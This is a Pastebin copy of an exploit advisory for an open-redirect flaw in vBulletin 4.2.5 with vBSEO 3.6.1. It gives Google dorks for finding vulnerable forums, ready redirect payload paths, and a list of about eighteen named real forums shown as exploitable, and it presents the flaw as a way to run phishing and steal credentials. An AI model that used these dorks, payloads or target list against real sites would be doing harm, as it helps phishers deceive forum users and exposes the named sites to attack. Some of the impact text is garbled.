Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : vBulletin 4.2.5 vBSEO 3.6.1 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 28/02/2019
- # Vendor Homepage : vbulletin.com ~ vbseo.com
- # Software Information Links :
- vbulletin.web.tr/forumdisplay.php/49-vBulletin-seo-vBseo-dbseo
- vbulletin-mods.com/forum/showthread.php?t=2362
- vbulletindestek.com/vbulletin-seo-islemleri/23-vbulletin-seo-3-
- 60-turkce-vbulletin-sitemap-generator-full-paket-download.html
- vbulletin.org/forum/showthread.php?t=129991
- vbseo.com/downloads/
- twitter.com/vbseo
- # Software Affected Version : vBulletin 3.x.x - 4.x.x - 4.2.5 / vBSEO 3.6.0 and vBSEO 3.6.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks :
- Search Engine Optimization by vBSEO 3.6.1 inurl:/?redirect=
- Search Engine Optimization by vBSEO 3.6.0 inurl:/forum/
- intext:Search Engine Friendly URLs by vBSEO 3.6.0 Responsive Style eTiKeT™ 2016
- intext:Search Engine Friendly URLs by vBSEO 3.6.0
- Powered by vBulletin® Version 4.2.0 inurl:/?redirect=
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- vBSEO is an SEO [ Search Engine Optimization ] solution for vBulletin.
- ####################################################################
- # Impact :
- ***********
- This web application/software vBulletin 4.2.5 vBSEO 3.6.1 accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value
- to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.
- Web users often encounter redirection when they visit the Web site of a company whose name
- has been changed or which has been acquired by another company. Visiting unreal web page
- user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
- ####################################################################
- Open Redirection Exploit :
- **********************
- /redirect-to/?redirect=http://www.[REDIRECTION-ADDRESS].gov
- /forum/redirect-to/?redirect=http://www.[REDIRECTION-ADDRESS].gov
- /vbulletin/redirect-to/?redirect=http://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] vbulletin.com.tr/redirect-to/?redirect=https://cxsecurity.com/
- [+] forums.roadbikereview.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] android.net/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] camarozone.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] frmtr.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] bitshacking.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] arsizbela.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] turkishajan.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] golfturkiye.net/redirect-to/?redirect=https://cxsecurity.com/
- [+] agaclar.net/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] forumaile.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] forums.khinsider.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] forum.knightonline.cc/redirect-to/?redirect=https://cxsecurity.com/
- [+] traidnt.net/vb/redirect-to/?redirect=https://cxsecurity.com/
- [+] forum.bilgilihocam.com/redirect-to/?redirect=https://cxsecurity.com/
- [+] hedgehogcentral.com/forums/redirect-to/?redirect=https://cxsecurity.com/
- [+] presta-tr.com/forum/redirect-to/?redirect=https://cxsecurity.com/
- [+] bristolcars.info/forums/redirect-to/?redirect=https://cxsecurity.com/
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment
